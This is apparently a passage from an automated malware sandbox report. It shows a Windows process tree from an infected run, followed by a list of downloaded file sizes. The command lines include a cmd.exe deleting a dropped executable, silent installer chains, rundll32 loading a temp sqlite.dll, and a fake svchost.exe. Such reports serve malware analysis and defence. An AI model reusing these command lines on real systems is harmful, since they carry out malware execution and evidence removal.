C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\mbSorhGxB1pNBjghFG36e2Ru.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\2291.exeC:\Users\Admin\AppData\Local\Temp\2291.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\A425.exeC:\Users\Admin\AppData\Local\Temp\A425.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-7INLQ.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-7INLQ.tmp\setup.tmp" /SL5="$7006C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B3219.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-B3219.tmp\setup.tmp" /SL5="$3023A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VS4MN.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-VS4MN.tmp\postback.exe" ss14⤵
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart4⤵
-
C:\79be67d71d75c862052a\Setup.exeC:\79be67d71d75c862052a\\Setup.exe /q /norestart /x86 /x64 /web5⤵
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss14⤵
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9F672BB2AD882941A49D0DA8334E06B9 C2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exe"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20211108-1628.dm1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Users\Admin\AppData\Roaming\whhjjetC:\Users\Admin\AppData\Roaming\whhjjet1⤵
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
184KB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
332KB
-
Filesize
4KB
-
Filesize
76KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
368KB
-
Filesize
32KB
-
Filesize
16.0MB
-
Filesize
184KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
176KB
-
Filesize
4KB
-
Filesize
864KB
-
Filesize
5.1MB
-
Filesize
4KB
-
Filesize
5.1MB
-
Filesize
5.1MB
-
Filesize
384KB
-
Filesize
4KB
-
Filesize
156KB
-
Filesize
428KB
-
Filesize
68KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
856KB
-
Filesize
868KB
-
Filesize
496KB
-
Filesize
3.1MB
-
Filesize
156KB
-
Filesize
32KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
6.0MB
-
Filesize
424KB
-
Filesize
152KB
-
Filesize
268KB
-
Filesize
8KB
-
Filesize
8KB